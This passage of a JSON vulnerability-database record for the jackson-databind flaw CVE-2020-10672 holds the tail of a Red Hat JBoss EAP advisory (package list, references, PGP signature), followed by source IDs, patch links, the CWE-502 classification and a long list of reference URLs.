atype-jdk8-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm\neap7-jackson-datatype-jsr310-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm\neap7-jackson-jaxrs-base-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm\neap7-jackson-jaxrs-json-provider-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm\neap7-jackson-module-jaxb-annotations-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm\neap7-jackson-modules-base-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm\neap7-jackson-modules-java8-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm\neap7-jboss-genericjms-2.0.6-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-jboss-jsf-api_2.3_spec-3.0.0-4.SP04_redhat_00001.1.el6eap.noarch.rpm\neap7-jboss-logmanager-2.1.15-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-jboss-server-migration-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-cli-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-core-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-eap6.4-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-eap6.4-to-eap7.3-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-eap7.0-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-eap7.1-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-eap7.2-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-eap7.2-to-eap7.3-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-eap7.3-server-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-wildfly10.0-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-wildfly10.1-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-wildfly11.0-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-wildfly12.0-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-wildfly13.0-server-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-wildfly14.0-server-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-wildfly15.0-server-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-wildfly16.0-server-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-wildfly17.0-server-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-wildfly18.0-server-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-wildfly8.2-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-server-migration-wildfly9.0-1.7.1-7.Final_redhat_00009.1.el6eap.noarch.rpm\neap7-jboss-xnio-base-3.7.8-1.SP1_redhat_00001.1.el6eap.noarch.rpm\neap7-netty-4.1.48-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-netty-all-4.1.48-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-undertow-2.0.30-4.SP4_redhat_00001.1.el6eap.noarch.rpm\neap7-undertow-server-1.6.2-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-wildfly-7.3.2-4.GA_redhat_00002.1.el6eap.noarch.rpm\neap7-wildfly-common-1.5.2-1.Final_redhat_00002.1.el6eap.noarch.rpm\neap7-wildfly-elytron-1.10.7-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-wildfly-elytron-tool-1.10.7-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-wildfly-http-client-common-1.0.22-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-wildfly-http-ejb-client-1.0.22-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-wildfly-http-naming-client-1.0.22-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-wildfly-http-transaction-client-1.0.22-1.Final_redhat_00001.1.el6eap.noarch.rpm\neap7-wildfly-javadocs-7.3.2-4.GA_redhat_00002.1.el6eap.noarch.rpm\neap7-wildfly-modules-7.3.2-4.GA_redhat_00002.1.el6eap.noarch.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n8. References:\n\nhttps://access.redhat.com/security/cve/CVE-2019-14900\nhttps://access.redhat.com/security/cve/CVE-2020-1710\nhttps://access.redhat.com/security/cve/CVE-2020-1748\nhttps://access.redhat.com/security/cve/CVE-2020-10672\nhttps://access.redhat.com/security/cve/CVE-2020-10673\nhttps://access.redhat.com/security/cve/CVE-2020-10683\nhttps://access.redhat.com/security/cve/CVE-2020-10687\nhttps://access.redhat.com/security/cve/CVE-2020-10693\nhttps://access.redhat.com/security/cve/CVE-2020-10714\nhttps://access.redhat.com/security/cve/CVE-2020-10718\nhttps://access.redhat.com/security/cve/CVE-2020-10740\nhttps://access.redhat.com/security/cve/CVE-2020-14297\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.3/\nhttps://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.3/html-single/installation_guide/\n\n9. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2020 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBXzqIS9zjgjWX9erEAQjYNxAAk4rojlcRbfjwu0wlWLTU1MbxQNclVtVh\nMpQnFzyvJVVXX0lslx7NGxHlRNWRgqI/XC1QDqlHpRs4du5/a2Uj+8c5u+WPQefF\nQCqOvSntbMli42/I7+fCehLVofx/HkuAVcBoGrIGby1E4rddDljh4bH3r43I7wa5\nHN9ki8uFAy8bIAzfXW+RB4rxtnsAABv/VFoH1fWmrXCXE6A6aG+AU86ddty0JQHN\nJhQp6v/X/3ccCvHYTAO8vlbqIJ4fE86e1+5oRBor+4ZD4mMVzGKm4cf8CMPXsKIB\n9dFGo8WHFBgEi4hBbBFtFfaE2DGZ6K4Q7X0IAhiiYJmpPg8NgzGiqVvOAG+/OrBz\nDE84ZPxZwS1zR82wwIyHP4W5mYIhQTxhtp+E9Klu4gpFIAmK8bVfGf2Ub0HOCS6z\nsbN1Eiv0SBfWRHBfBkuRTBd0aEcmGRNl4GSXzXtanTf0OhFk/4pxdJPmKDEBFWvg\n3dtwFi7+/8JoAch8GKQCo4UoSo6etQu45sUH6Q8ozuxYA72+J9K7cpwp/fVhiYRT\nnruC+2HDuugrC8UVJ/24E++49omdSXAm+UR9tvkFdVU3IpXLJNWO8s4QbrGC7CN7\nLvg/ukygGhrEEyQ1J9yYSeeNISQWJGOSKj/bgYRAh/AbX/QcZZfus7ppAasNjndn\nBk4PSTq9yaw=\n=ZNiG\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-10672"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003144"
},
{
"db": "VULHUB",
"id": "VHN-163174"
},
{
"db": "PACKETSTORM",
"id": "158650"
},
{
"db": "PACKETSTORM",
"id": "157741"
},
{
"db": "PACKETSTORM",
"id": "158884"
},
{
"db": "PACKETSTORM",
"id": "159083"
},
{
"db": "PACKETSTORM",
"id": "159081"
},
{
"db": "PACKETSTORM",
"id": "159080"
},
{
"db": "PACKETSTORM",
"id": "159082"
}
],
"trust": 2.34
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2020-10672",
"trust": 3.2
},
{
"db": "PACKETSTORM",
"id": "159083",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003144",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "158636",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "159208",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "158651",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "158916",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "158891",
"trust": 0.7
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1150",
"trust": 0.7
},
{
"db": "CS-HELP",
"id": "SB2022060909",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2588",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2826",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1882",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2837",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1040",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1766",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2619",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.3065",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.3190",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "157859",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "48048",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "158884",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "159080",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "159082",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "159081",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "158650",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "158889",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "158881",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-163174",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "157741",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163174"
},
{
"db": "PACKETSTORM",
"id": "158650"
},
{
"db": "PACKETSTORM",
"id": "157741"
},
{
"db": "PACKETSTORM",
"id": "158884"
},
{
"db": "PACKETSTORM",
"id": "159083"
},
{
"db": "PACKETSTORM",
"id": "159081"
},
{
"db": "PACKETSTORM",
"id": "159080"
},
{
"db": "PACKETSTORM",
"id": "159082"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1150"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003144"
},
{
"db": "NVD",
"id": "CVE-2020-10672"
}
]
},
"id": "VAR-202003-1779",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-163174"
}
],
"trust": 0.01
},
"last_update_date": "2026-03-09T21:37:08.932000Z",
"patch": {
"_id": null,
"data": [
{
"title": "[SECURITY] [DLA 2153-1] jackson-databind security update",
"trust": 0.8,
"url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00027.html"
},
{
"title": "Block one more gadget type (aries.transaction.jms, CVE-2020-10672) #2659",
"trust": 0.8,
"url": "https://github.com/FasterXML/jackson-databind/issues/2659"
},
{
"title": "FasterXML jackson-databind Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=112628"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202003-1150"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003144"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-502",
"trust": 1.0
},
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
},
{
"problemtype": "CWE-Other",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003144"
},
{
"db": "NVD",
"id": "CVE-2020-10672"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10672"
},
{
"trust": 1.7,
"url": "https://security.netapp.com/advisory/ntap-20200403-0002/"
},
{
"trust": 1.7,
"url": "https://github.com/fasterxml/jackson-databind/issues/2659"
},
{
"trust": 1.7,
"url": "https://www.oracle.com/security-alerts/cpujan2021.html"
},
{
"trust": 1.7,
"url": "https://www.oracle.com/security-alerts/cpujul2020.html"
},
{
"trust": 1.7,
"url": "https://www.oracle.com/security-alerts/cpuoct2020.html"
},
{
"trust": 1.7,
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
},
{
"trust": 1.7,
"url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00027.html"
},
{
"trust": 1.0,
"url": "https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-10672"
},
{
"trust": 0.7,
"url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/cve/cve-2020-10672"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/cve/cve-2020-10673"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.7,
"url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.7,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2020-9547"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2020-9546"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2020-9548"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2020-8840"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10673"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/158636/red-hat-security-advisory-2020-3192-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022060909"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-series-of-vulnerabilities-in-fasterxml-jackson-databind-affect-apache-solr-shipped-with-ibm-operations-analytics-log-analysis/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-jackson-databind-shipped-with-ibm-cloud-pak-system/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/157859/red-hat-security-advisory-2020-2333-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2588/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2837/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6525182"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-faster-xml-jackson-databind-affect-ibm-spectrum-protect-plus-cve-2020-10673-cve-2020-1112-cve-2020-11113-cve-2020-10672-cve-2020-10968-cve-2020-10969-cve-2/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2619/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/158916/red-hat-security-advisory-2020-3501-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1766/"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/48048"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1882/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/158651/red-hat-security-advisory-2020-3197-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/158891/red-hat-security-advisory-2020-3463-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/159208/red-hat-security-advisory-2020-3779-01.html"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6528214"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-security-vulnerabilities-in-jackson-databind-affect-ibm-sterling-b2b-integrator-3/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2826/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.3190/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1040/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-affects-ibm-jazz-foundation-and-ibm-engineering-products/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/159083/red-hat-security-advisory-2020-3642-01.html"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/fasterxml-jackson-databind-privilege-escalation-via-xapooledconnectionfactory-31849"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.3065/"
},
{
"trust": 0.5,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1710"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10740"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14297"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10693"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10687"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-10714"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-14297"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14900"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10683"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10714"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-10683"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-10693"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-10687"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2019-14900"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-10740"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-1710"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-10718"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10718"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1748"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-1748"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-6950"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-1695"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9547"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1695"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.2/html-single/installation_guide/"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9548"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9546"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.2/"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8840"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-6950"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14307"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-14307"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-11112"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12406"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-11113"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9514"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-10968"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-9512"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-12406"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-9514"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20330"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-9515"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-11619"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-10969"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-11620"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-20330"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9512"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-7238"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-11111"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14060"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-17573"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20444"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1718"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14060"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9515"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-13990"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11620"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17573"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11612"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14061"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-20445"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1718"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-9518"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-20444"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13990"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3196"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14062"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=rhdm\u0026version=7.8.0"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-16869"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11619"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-7238"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11111"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12423"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11112"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-11612"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16869"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12423"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10968"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_decision_manager/7.8/html/release_notes_for_red_hat_decision_manager_7.8/index"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20445"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9518"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10969"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14061"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11113"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14062"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-16335"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-3875"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14832"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-16943"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10201"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_build_of_thorntail/2.5/html/release_notes_for_thorntail_2.5/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:2067"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-3875"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14838"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9511"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12400"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-0210"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-0205"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12419"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-17531"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16335"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-0210"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10086"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10219"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14832"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17531"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14540"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17267"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10199"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=catrhoar.thorntail\u0026version=2.5.1"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-9511"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16942"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14887"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14892"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10201"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1729"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16943"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12419"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-17267"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-0205"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14893"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10199"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-16942"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14893"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14888"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12400"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14838"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14892"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10219"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10086"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14887"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14540"
},
{
